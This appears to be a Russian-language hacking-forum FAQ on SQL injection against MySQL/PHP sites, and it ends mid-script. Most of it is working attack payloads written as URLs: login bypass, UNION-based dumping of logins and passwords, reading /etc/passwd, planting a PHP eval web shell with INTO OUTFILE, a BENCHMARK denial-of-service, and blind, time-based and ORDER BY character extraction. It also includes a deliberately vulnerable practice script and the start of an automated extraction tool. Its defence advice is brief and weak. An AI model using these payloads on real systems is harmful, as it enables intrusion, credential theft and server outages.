special

  1. HOME
  2. Хакерство и защита
  3. SQL Injection

SQL Injection [полный FAQ]



  • 0.INTRO
  • 1. КАК НАЙТИ SQL INJECTION
  • 2. ЧТО И КАК МОЖНО ИЗВЛЕЧЬ ИЗ ЭТОГО ПОЛЕЗНОЕ
  • 3. ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ.
  • 4. ЧТО ДЕЛАТЬ ЕСЛИ ЧТО-ТО ФИЛЬТРУЕТСЯ.
  • 5. ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL
  • 6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION
  • 7. ДОПОЛНЕНИЯ


    • 0.INTRO


    Лазив по интернету в поисках хоть какой то инфы по SQL injection ты наверно часто натыкался на статьи либо очень короткие, либо не понятные, либо освещающие одну тему либо еще что-то которые разумеется тебя не устраивали. Когда то и я насобирал где то статей 10-20 по этой теме чтобы вникнуть во многие тонкости этой уязвимости. И вот вспоминая те времена решил написать полный FAQ по этой теме, чтобы так сказать остальные не мучались. И еще одна просьба. Те кто найдет что я что то пропустил, где то ошибся и тд пожалуйста отпишитесь ниже, трудно все таки, все удержать в голове :). Кстати это моя первая статья, пожалуйста не кидайтесь помидорами, и не пинайте ногами.

    Не первый день увлекаясь взломом ты наверно знаешь что такое SQL injection если нет то я это статья для тебя. SQL injection дальше просто инъекция это тип атаки при котором взломщиком модифицируется оригинальный запрос к БД таким образом чтобы при выполнении запроса была выведена нужная ему информация из БД.

    Для усвоения этой статьи требуется:
    а) Наличие мозгов
    б) Прямые руки
    в) Знания языка SQL

    В основном эта статья писалась как для MYSQL+PHP но есть и пара примеров с MSSQL.

    Вообще по-моему самый лучший способ обучиться правильной работе с SQL injection это не прочтение этой статьи, а живая практика, например самому написать уязвимый скрипт, или использовать мой приведенный в самом конце.

    Кстати советую читать все подряд потому что в каждом пункте есть что то важное для следующего пункта и т.д.

    1. КАК НАЙТИ SQL INJECTION

    Это довольно таки просто. Надо вставлять во все поля, переменные, куки двойную и одинарные кавычки.

    1.1 Второй первый

    Начнем с вот такого скрипта

    1. Предположим что оригинальный запрос к БД выглядит так:
    SELECT * FROM news WHERE id='1'; Теперь мы допишем кавычку в переменную "id", вот так - если переменная не фильтруется и включены сообщения об ошибках то вылезет что то наподобие:

    mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

    Так как в запросе к БД будет присутствовать лишняя кавычка:
    SELECT * FROM news WHERE id='1''; Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так (Также не помешало бы это, что бы не спутать с пунктом 1.4. Как именно описанно в этом же пункте): То есть запрос к БД станет вот таким:
    SELECT * FROM news WHERE id='1'; -- '; (Для тех кто в танке “--“ это знак начала комментария все после него будет отброшено, еще хочу обратить ваше внимание на то что после него должен быть обязательно пробел(Так написано в документации к MYSQL) и кстати перед ним тоже). Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для http://xxx/news.php?id=1
    Тому что делать с этой уязвимостью посвящен весь пункт 2.

    1.2 Второй случай

    В SQL есть оператор LIKE. Он служит для сравнения строк. Вот допустим скрипт авторизации при вводе логина и пароля запрашивает БД вот так:
    SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123';

    Даже если этот скрипт фильтрует кавычку то все равно он остается уязвимым для инъекции. Нам нужно вместо пароля просто ввести "%" (Для оператора LIKE символ "%" соответствует любой строке) и тогда запрос станет
    SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%';

    и нас пустят внутрь с логином 'Admin'. В этом случае мы не только нашли SQL injection но и успешно ее использовали.

    1.3 Третий случай

    Что делать если в том же скрипте авторизации отсутствует проверка на кавычку. Имхо будет как минимум глупо использовать эту иньекцию для вывода какой нибудь информаци. Пускай запрос к БД будет типа:
    SELECT * FROM users WHERE login='Admin' AND pass='123';

    К сожалению пароль '123' не подходит :) , но мы нашли иньекцию допустим в параметре 'login' и что бы зарегистрироваться под ником 'Admin' нам нужно вписать вместо него что то наподобие этого Admin'; -- то есть часть с проверкой пароля отбрасывается и мы входим под ником 'Admin'.
    SELECT * FROM users WHERE login='Admin'; -- ' AND pass='123';

    А теперь что делать если уязвимость в поле 'pass'. Мы вписываем в это поле следующее 123' OR login='Admin'; -- . Запрос станет таким:
    SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin'; -- ';

    Что для БД будет совершенно индеинтично такому запросу:
    SELECT * FROM users WHERE (login='Admin' AND pass='123') OR (login='Admin');

    И после этих действий мы станем полноправным владельцем акка с логином 'Admin'.

    1.4 Четвертый случай

    Вернемся к скрипту новостей. Из языка SQL мы должны помнить что числовые параметры не ставятся в кавычки то есть при таком обращении к скрипту http://xxx/news.php?id=1 запрос к БД выглядит вот так:
    SELECT * FROM news WHERE id=1;

    Обнаружить эту иньекцию также можно подстановкой кавычки в параметр 'id' и тогда выпрыгнет такое же сообщение об ошибке:

    mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

    Если это сообщение не выпригивает то можно понять что кавычка фильтруется и нужно тогда вписать http://xxx/news.php?id=1 bla-bla-bla
     БД не поймет шо это за бла бла бла и выдаст сообщение об ошибке типа:

    mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 bla-bla-bla'

    Если отчет об ошибках выключен тогда проверяем вот так http://xxx/news.php?id=1; --
    Должно отобразиться точно также как и http://xxx/news.php?id=1

    Теперь можно переходить к пункту 2.

    2. ЧТО И КАК МОЖНО ИЗВЛЕЧЬ ИЗ ЭТОГО ПОЛЕЗНОЕ

    Дальше будет рассматриваться только тип уязвимости описанный в пункте 1.1 а переделать под остальные сможете сами это не трудно :)

    2.1 Команда UNION

    Для начала самое полезное это команда UNION (кто не знает лезть в гугл )…
    Модифицируем обращение к скрипту http://xxx/news.php?id=1' UNION SELECT 1 -- . Запрос к БД у нас получается вот таким:
    SELECT * FROM news WHERE id='1' UNION SELECT 1 -- ';


    2.1.1.1 Подбор количества полей(Способ 1)

    Не забывая про то что количества столбцов до UNION и после должны соответствовать наверняка вылезет ошибка (если только в таблице news не одна колонка) наподобие:

    mysql_query(): The used SELECT statements have a different number of columns

    В данном случае нам нужно подобрать количиство столбцов (что бы их количество до UNION и после соответсвовало). Делаем это так:

    http://xxx/news.php?id=1' UNION SELECT 1, 2 --
    Ошибка. «The used SELECT statements have a different number of columns»

    http://xxx/news.php?id=1' UNION SELECT 1,2,3 --
    Опять ошибка.


    http://xxx/news.php?id=1' UNION SELECT 1,2,3,4,5,6 --
    О! Отобразилось точно также как и http://xxx/news.php?id=1
    значит количество полей подобрано, то есть их 6 штук…


    2.1.1.2 Подбор количества полей(Способ 2)

    А этот способ основан на подборе количества полей с помощью GROUP BY. То есть запрос такого типа:

    http://xxx/news.php?id=1' GROUP BY 2 --

    Будет отображен без ошибок если количество полей меньше или равно 2.
    Делаем запрос такого типа:

    http://xxx/news.php?id=1' GROUP BY 10 --

    Упс... Появилась ошибка типа.

    mysql_query(): Unknown column '10' in 'group statement'

    Значит столбцов меньше чем 10. Делим 10 на 2. И делаем запрос

    http://xxx/news.php?id=1' GROUP BY 5 --


    Опа ошибки нет значит количество столбцов больше либо равно 5 но меньше чем 10. Теперь берем среднее значение между 5 и 10 это получается вроде 7. Делаем запрос:

    http://xxx/news.php?id=1' GROUP BY 7 --

    Ой опять ошибка... :(

    mysql_query(): Unknown column '7' in 'group statement'

    Значит количество больше либо равно 5 но меньше чем 7. Ну и дальше делаем запрос

    http://xxx/news.php?id=1' GROUP BY 6 --

    Ошибок нет... Значит число больше либо равно 6 но меньше чем 7. Отсюда следует что искомое число столбцов 6.

    2.1.1.3 Подбор количества полей(Способ 3)

    Тот же самый принцип что и в пункте 2.1.1.2 только используется функция ORDER BY. И немного меняется текст ошибки если полей больше.

    mysql_query(): Unknown column '10' in 'order clause'

    2.1.2 Определение выводимых столбцов

    Я так думаю что многим из нас точно такая страница как и http://xxx/news.php?id=1 не устроит. Значит нам нужно сделать так чтобы по первому запросу ничего не выводилось (до UNION). Самое простое это поменять "id" с '1' на '-1' (либо на '9999999')
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 -- Теперь у нас кое где в странице должны отобразится какие-нибудь из этих цифр. (Например так как это условно скрипт новости то в «Название новости» будет отображенно допустим 3, «Новость»-4 ну и тд). Теперь чтобы нам получить какую нибудь информацию нам нужно заменять эти цифры в обрщении к скрипту на нужные нам функции. Если цифры не отобразились нигде то остальные подпункты пункта 2.1 можно пропустить.

    2.1.3 SIXSS (SQL Injection Cros Site Scripting)

    Эта таже XSS только через запрос к базе. Пример:
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<script>alert('SIXSS')</script>',5,6 --Ну думаю понять не трудно что 4 в странице заменится на <script>alert(‘SIXSS’)</script> и соответственно получится таже XSS.

    2.1.4 Названия столбцов/таблиц

    Если ты знаешь названия таблиц и стобцов в БД этот пункт можно пропустить
    Если не знаешь… Тут два пути.

    2.1.4.1 Названия столбцов/таблиц если есть доступ к INFORMATION_SCHEMA и если версия MYSQL >=5

    Таблица INFORMATION_SCHEMA.TABLES содержит информацию о всех таблицах в БД, столбец TABLE_NAME-имена таблиц.
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES -- Вот тут может появится проблема. Так как будет выводится только первая строка из ответа БД. Тогда нам нужно воспользоваться LIMIT вот так:

    Вывод первой строки:
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --

    Вывод второй строки:
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 2,1 --и т.д.

    Ну вот мы и нашли таблицу Users. Только это… кхм… стобцы не знаем… Тогда к нам приходит на помощь таблица INFORMATION_SCHEMA.COLUMNS столбец COLUMN_NAME содержит название столбца в таблице TABLE_NAME. Вот так мы извлекаем названия столбцов

    http://xxx/news.php?id=-1' UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 --

    http://xxx/news.php?id=-1' UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users' LIMIT 2,1 --
    и т.д.

    И вот мы нашли поля login, password.

    2.1.4.2 Названия столбцов/таблиц если нет доступа к INFORMATION_SCHEMA

    Это жопный вариант :(.Тут в силу вступает обычный брутофорс... Пример:

    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 FROM Имя_таблицы --

    Нужно подбирать Имя_таблицы до тех пор пока не пропадет сообщение об ошибке типа:

    mysql_query(): Table 'Имя_таблицы' doesn't exist

    Ну ввели мы к своему счастью Users пропало сообщение об ошибке, и страница отобразилась как при http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 -- что это значит? Это значит то что существет таблица Users и нужно приступить к перебору столбцов.

    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,Имя_столбца,5,6 FROM Users --

    Нужно подбирать Имя_столбца до тех пор пока не пропадет сообщение об ошибке типа:

    mysql_query():Unknown column 'Имя_столбца'' in 'field list'

    Там где пропадает сообщение об ошибке значит такой столбец существует.

    И вот таким образом мы узнали что в таблице Users есть столбцы login, password.

    2.1.5 Вывод информации

    Обращение к скрипту таким образом http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 1,1 -- Выводит нам логин и пароль первого юзера из таблицы Users.

    2.2 Работа с файлами

    2.2.1 Запись в файл

    Есть в MYSQL такая интересная функция типа SELECT … INTO OUTFILE позволяющая записывать информацию в файл. Либо такая конструкция SELECT ... INTO DUMPFILE они почти похоже и можно использовать любую.

    Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; --


    Для нее работает несколько ограничений.
    • Запрещенно перезаписывание файлов
    • Требуются привилегии типа FILE
    • (!)Обязательны настоящие кывычки в указании имени файла

    А вот что бы нам мешало сделать веб шел? Вот например так:

    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --

    Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.

    2.2.2 Чтение файлов

    Рассмотрим функцию LOAD_FILE

    Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('etc/passwd'),4,5,6;

    Для нее есть также несколько ограничений.
    • Должен быть указан полный путь к файлу.
    • Требуются привилегии типа FILE
    • Файл должен находится на одном и том же сервере
    • Размер данного файла должен быть меньше указанного в max_allowed_packet
    • Файл должен быть открыт для чтения юзером из-под которого запущен MYSQL

    Если функции не удастся прочитать файл то она возвращает NULL.

    2.3 DOS атака на SQL сервер

    В большинстве случаев SQL сервер досят из-за того что больше ничего сделать не могут. Типа не получилось узнать таблицы/столбцы, нет прав на это, нет прав на то и т.д. Я честно говоря против этого метода но все таки...

    Ближе к делу…
    Функция BENCHMARK выполняет одно и тоже действие несколько раз.
    SELECT BENCHMARK(100000,md5(current_time));

    То есть здесь эта функция 100000 раз делает md5(current_time) что у меня на компе занимает приблизительно 0.7 секунды... Казалось что здесь такого... А если попробовать вложенный BENCHMARK?

    SELECT BENCHMARK(100000,BENCHMARK(100000,md5(current_time )));

    Выполняется очень долго честно говоря я даже не дождался... пришлось делать reset :).
    Пример Доса в нашем случае:

    http://xxx/news.php?id=-1' UNION SELECT 1, 2, BENCHMARK(100000,BENCHMARK(100000,md5(current_time ))), 4, 5, 6; --

    Достаточно раз 100 потыкать F5 и «сервер упадет в беспробудный даун» ))).
    3.ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ.

    3.1 Посимвольный перебор

    Этот случай нужен нам если http://xxx/news.php?id=1 при разных id выдаст нам разные результаты. Например http://xxx/news.php?id=1 будет отлично от http://xxx/news.php?id=0 если нет, то этот метод бесполезен но дочитать до конца стоит.

    Как мы помним запрос к БД у нас выглядит так
    SELECT * FROM news WHERE id='1';

    Теперь мы его модифицируем через уязвимый парамтр id до такого запроса (если что то незнакомое то идем в пункт 5 и читаем):
    SELECT * FROM news WHERE id='-1' OR id=IF(ASCII((SELECT USER()))>=254,'1','0') -- ';

    Вот так:

    http://xxx/news.php?id=-1' OR id=IF(ASCII((SELECT USER()))>=254,'1','0') --

    Что нам это дает? Для начала MYSQL выполняет подзапрос SELECT USER() вставляет его в функцию ASCII() которая возвращает ascii код первого символа из результата выполнения подзапроса а функция IF() возвращает 1 если этот код больше или равен 100
    oсновной запрос становиться таким
    SELECT * FROM news WHERE id='-1' OR id=1

    и выполняется точно также как и при обращении к скрипту http://xxx/news.php?id=1 а если код этого числа меньше то основной запрос становиться таким
    SELECT * FROM news WHERE id='-1' OR id=0

    и выполняется точно также как и при http://xxx/news.php?id=0 Назовем условно что запрос возвращает 1(да) или 0(нет) соответственно и начнем перебирать.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0')
    Ага вернулся 1 значит код первого символа больше или равен 100. Пробуем вот так:

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=200,'1','0')
    Вернулся 0 значит 100<= код символа <200.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=150,'1','0')
    Опять вернулся 0 значит 100<= код символа <150.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=125,'1','0')
    И снова вернулся 0 значит 100<= код символа <125.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=113,'1','0')
    Вернулся 1 следовательно113<= код символа <125.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=118,'1','0')
    Возвращается 0 следовательно113<= код символа <118.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=115,'1','0')
    113<= код символа <115.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1) =113,'1','0')
    Вернулся 0 значит код символа не равен 113.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)=114,'1','0')
    Ура! Вернулся 1 значит код символа равен 114. Переводим в символ и получаем символ "r". Теперь переходим к следующему символу.

    http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),2,1)>=100,'1','0')

    И заново повторяем все предыдущие шаги.

    3.2 Посимвольный перебор с помощью BENCHMARK

    Что делать если отсутствует выводимые поля и выключены отчеты об ошибках? На помощь нам прийдет функция BENCHMARK. Как было написано выше, эта функция выполняет одно действие несколько раз. Ну и что спросишь ты... А вот что. Вспомним что запрос
    SELECT BENCHMARK(100000,BENCHMARK(100000,md5(NOW())));

    выполняется ооочень долго, и на основе задержек (нет, не пугайся не тех задержек, что сейчас подумал) будем посимвольно перебирать какой-нибудь параметр допустим имя юзера под которым мы подключены к БД (его выводит нам функция USER()).

    http://xxx/news.php?id=-1' OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, BENCHMARK(2999999,MD5(NOW()))) --

    Запрос станет таким:

    SELECT * FROM news WHERE id='-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, BENCHMARK(2999999,MD5(NOW()))) -- ';


    И теперь по аналогии с предыдущим пунктом мы будем перебирать строку USER(). Только в данном случае вместо 0 функция будет очень долго выполнять этот запрос что и будет нам говорить о том что запрос вернул 0 и соответственно если без каких либо задержек то запрос возвращает 1.

    Теперь поговорим о времени задержки. Для того чтобы определить время возврата 0 и 1 нужно сделать предварительно несколько запросов:

    http://xxx/news.php?id=-1' OR id= IF(99>100, 1, BENCHMARK(2999999,MD5(NOW())))

    Будет возвращать 0. Нужно засечь время. В зависимости от ширины вашего канала нужно подобрать число 2999999 до той степени чтобы вы могли точно судить была ли задержка или нет по сравнению с

    http://xxx/news.php?id=-1' OR id= IF(101>100, 1, BENCHMARK(2999999,MD5(NOW())))

    который вернет 1.

    Огромным минусом является то что BENCHMARK-ом мы очень сильно грузим сервак.

    ВНИМАНИЕ! В данном случае главное не забывать что после каждого выполнения BENCHMARK-а серверу SQL нужно дать некоторое время отдых. (Чуть больше чем само выполнение BENCMARK-а). В противном случае результаты данного перебора могут быть неверными.

    3.3 Посимвольный перебор с помощью отчета об ошибках

    Этот пункт написан на основе (только на основе, без перепечаток!) статьи "Новая альтернатива Benchmark'y или эффективный blind SQL-injection" автор Elekt, респект ему.

    Данный способ основан на том что вместо возврата 0, выполняется подзапрос который вызывает ошибку и по выводу ошибок можно судить что возвратился 0 а по отсутствию ошибки что возвратился 1. Этот способ нам поможет если отсутствуют выводимые поля но ВКЛЮЧЕН(!) отчет об ошибках.
    SELECT * FROM news WHERE id='-1' OR id=(SELECT 1 UNION SELECT 2)

    Как вы думаете что вернет этот запрос? Правильно ошибку так как id сравнивается с подзапросом который возвращает две строки.

    mysql_query():Subquery returns more than 1 row

    Это была теория. Теперь переходим к запросу с помощью которого мы будем перебирать символы
    SELECT * FROM news WHERE id='-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1,(SELECT 1 UNION SELECT 2)) -- ';

    Как видно из этого запроса если код символа будет больше или равен 100 функция IF() возвращает 1, и никакой тогда ошибки не вылазит, а если функция выполняет подзапрос
    SELECT 1 UNION SELECT 2

    который возвращает две строки что при сравнении с id вызывает ошибку и мы понимаем что запрос вернул 0.

    Огромным минусом этого способа является то что в логах скапливаются огромные количества ошибок. А огромным плюсом является скорость работы.

    3.4 Иньекция после ORDER BY

    Почему то у многих сложилось мнение, что это безнадежный случай. Ну что же будем менять это мнение на противоположное. Допустим к БД запрос выглядит вот так:
    SELECT * FROM news ORDER BY $by

    ну и как всегда бывает переменная $by не проходит фильтрации, а на странице выводятся несколько строк из БД. Что ж нам требуется получить два запроса, которые бы изменяли каким то образом вывод на страницу, но еще запросы должны быть такими чтобы можно было влиять на результат с помощью допустим подзапросов. Что же такими запросами могут стать
    http://xxx/news.php?by=(id*1)
    http://xxx/news.php?by=(id*-1)
    Надеюсь как вы догадались в второй раз выборка пойдет "сверху вниз" относительно первого запроса, понять почему не сложно. Допустим в первый раз вывелось, примим это за истину:
    Первая новость Вторая новость Третья новость

    А во второй ложь:
    Третья новость Вторая новость Первая новость

    Ну чтоже запрос для брута имени текущего юзера будет выглядеть так:
    http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=112,1,-1))
    Чтож вывелся обратный порядок новостей => ложь
    http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
    Опять ложь
    http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=114,1,-1))
    О! Прямой порядок новостей => истина
    Переводим код символа 114 в символ r. Переходим к следующему символу и тд.

    4.ЧТО ДЕЛАТЬ ЕСЛИ ЧТО-ТО ФИЛЬТРУЕТСЯ.


    4.1 Фильтруется пробел

    Ну для начала вспомним что для SQL конструкция типа /**/ равна пробелу. А также можно перейти к пункту 4.2.

    4.2 Фильтруется символ/строка

    Есть интересная функция которая возвращает по коду символа сам символ.Предположим фильтруется символ... ну пускай будет звездочка (*). Для начала нам нужно узнать код этого символа. В MYSQL есть функция ASCII() возвращает код самого левого символа из переданной ей строке юзается так
    SELECT ASCII('*');

    только на уязвимом хосте этого делать смысла нет (Символ '*' фильтруется) это нужно сделать на локалке. Узнаем что код равен 42 и юзаем функцию CHAR() так
    SELECT CHAR(42, 42, 42);

    Выведет три звездочки.Еще один способ это использовать 16-ричный код символа. Теперь предположим что фильтруется солово 'login'. В MYSQL есть функция HEX() которая выдает 16-ричный код строки. Юзается так
    SELECT HEX('login');

    Выдаст '6C6F67696E' впереди дописываем "0x" (Чтобы SQL понял что имеет дело с 16-ричной кодировкой) и получаем '0x6C6F67696E ' это юзать без CHAR() так
    SELECT 0x6C6F67696E FROM User;
    либо с так
    SELECT CHAR(0x6C,0x6F,0x67,0x69,0x6E) FROM User;


    5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL


    Надеюсь что за SELECT, INSERT, UPDATE, DELETE, DROP вы знаете, если нет то лезем в эту книжку читать: google.com (Большой справочник языку SQL).

    ----------------------------
    USER()-функция выводит логин юзера под которым мы подключены к MYSQL
    DATABASE()-функция выводит название БД к которой мы подключены
    VERSION()-выводит версию MYSQL
    ----------------------------
    ASCII(str)-возвращает ASCII код первого символа в строке "str"
    CHAR(xx1,xx2,...)-возвращает строку состоящую из сомволов ASCII коды которых xx1, xx2 и т.д.
    HEX(str)-возвращает 16-ричный эквивалент строки "str".
    ----------------------------
    LENGTH(str)- Возвращает длину строки "str".
    SUBSTRING(str,pos[,len]) -Возвращает подстроку длиной len(если не указан то до конца строки "str") символов из строки "str", начиная от позиции pos.
    LOCATE(substr,str[,pos]) -Возвращает позицию первого вхождения подстроки "substr" в строку "str" начиная с позиции pos(если не указанно то с начала строки "str"). Если подстрока "substr" в строке "str" отсутствует, возвращается 0.
    ----------------------------
    LOWER(str)-переводит в нижний регистр строку "str"(по-моему только латиницу)
    CONCAT(param1,param2,...) -объединение подстрок в одну строку.
    CONCAT_WS(sep,param1,param2,...) -объединение подстрок в одну строку c разделителем "sep".
    ----------------------------
    IF(exp,ret1,ret2)-Проверяет условие exp если оно верно (не равно 0) то возвращает строку ret1 а если нет то возвращает строку ret2.
    ----------------------------
    expr BETWEEN min AND max-Если величина выражения expr больше или равна заданному значению min и меньше или равна заданному значению max, то функция BETWEEN возвращает 1, в противном случае - 0.
    ----------------------------
    AES_DECRYPT(AES_ENCRYPT('строка','bla'),'bla') Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.
    ----------------------------



    Теперь о комментариях в Mysql
    1)# символ начала комментария в MySQL. Пример:
    SELECT pass,login FROM users #This is comment

    что аналогично запросу
    SELECT pass,login FROM users

    2)-- еще один вариант комментария в MySQL. Обязателен пробел после этого знака. Пример:
    SELECT pass,login FROM users -- This is comment

    3)/* */ аналог комментария СИ в MySQL. Закрывающая часть необязательна. Для MySQL индеинтична пробелу. Примеры:
    SELECT pass,login FROM users /*This is comment SELECT pass,login/*This is comment*/FROM users SELECT/**/pass,login/**/FROM/**/users

    4) /*!int*/ Расширение предыдущего комментария. Все заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше. Пример:
    SELECT pass/*!32302 ,login*/FROM users
    Выведет столбец login если версия MySQL равна либо выше 3.23.02

    6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION


    Вы конечно понимаете что именно для этого пункта и писалась вся эта статья. Все пункты и их подпункты были написанны лишь для того что бы понять все серьезнось ситуации, а за использование этих пунктов в целях противоречащих УКРФ автор данной статьи ответственность не несет.

    А защитится очень просто. Кстати все три правила относятся к трем способам передачи информации серверу GET, POST, Cookie.

    1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
    -------------------------------
    2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
    -------------------------------
    3)Не использовать при сравнении прерменных без кавычек типа SELECT …WHERE id=$id а использовать так SELECT ...WHERE id='$id' и обратиться к пункту 1

    7.ДОПОЛНЕНИЯ


    Код уязвимого скрипта 
    <?php
//Настройки БД
$script['mysql_server']='localhost';//Хост
$script['mysql_login']='root';//Логин
$script['mysql_password']='';//Пароль
$script['mysql_db']='test';//Имя БД

//Сам скрипт
$body="";
$body.="<html>
<head><title>Новости</title></head>
<body>

";

mysql_connect($script['mysql_server'], $script['mysql_login'], $script['mysql_password']) or die('Не могу подключиться к серверу');
mysql_select_db($script['mysql_db']) or die('Не могу подключиться к БД');

if(!empty($_GET['id']))//Вывод одной новости
{
	$body.="<h3>Просмотр новости</h3> \n<br>";
	$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";//Уязвимый запрос
	$result=mysql_query($zapros);
	echo(Mysql_error());//Вывод ошибки
	$data=mysql_fetch_row($result);
	//Вывод результата запроса
	$body.="Заголовок: <b>".$data['3']."</b>\n";
	$body.="<hr><pre>".$data['4']."</pre>\n";
	$body.="<hr>Добавленно ".$data['5']." ".$data['1']." в ".$data['2']."\n<br><br>";
	$body.="<a href='?'>Назад</a>";
}
else //Ну и простое отображение всех новостей(шоб понятней было где скуль)
{

	$body.="<h3>Все новости</h3> \n<br>";
	$zapros="SELECT * FROM news;";
	$result_z=mysql_query($zapros);
	$count_str=mysql_num_rows($result_z);
	for($i=1;$i<=$count_str;$i++)
	{
		$result=@mysql_fetch_assoc($result_z);
		$body.=$i.".<a href='?id=".$i."'>".$result['caption']."<a/><br>\n";
	}
}
$body.="</body></html>";
echo($body);
?>

    Дамп базы 
    CREATE TABLE `news` (
  `id` int(11) NOT NULL default '0',
  `date` varchar(8) NOT NULL default '',
  `time` varchar(7) NOT NULL default '',
  `caption` varchar(50) NOT NULL default '',
  `text` text NOT NULL,
  `avtor` varchar(50) NOT NULL default ''
) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

INSERT INTO `news` VALUES (1, '23/03/07', '12:30', 'Здравствуй вася :)', 'Ну что начинай хакать этот скриптег :)\r\nИ побыстрее а то малоли... :P', 'I-I()/Ib');
INSERT INTO `news` VALUES (2, '24/03/07', '11:10', 'Гы а это для разнообразия', 'А то я подумал вдруг мало будет новостей :))\r\nТолько за дизайн извиняюсь... както кривовато смотриться ну да лано...', 'I-I()/Ib');

CREATE TABLE `users` (
  `login` varchar(20) NOT NULL default '',
  `password` varchar(20) NOT NULL default ''
) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

INSERT INTO `users` VALUES ('Admin', 'PaSsWoRd');
INSERT INTO `users` VALUES ('User', '123456');
INSERT INTO `users` VALUES ('Looser', 'big_password');

    Вообщем надеюсь вы поняли что надо с этим сделать...

    А теперь что-то пополезнее.

    Скрипт для вывода инфы через LIMIT или еще что нибудь этого рода 
    <?php
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://test/news.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-1 UNION SELECT CONCAT(0x313231323132,TABLE_NAME, 0x2D, COLUMN_NAME, 0x323132313231) FROM INFORMATION_SCHEMA.COLUMNS LIMIT +++counter+++,1/*';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='0';//Начальное значение счетчика
$set['s']='500';//Конечное значение счетчика
$set['h']='test';//Хост

if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре

//Создаем пакет
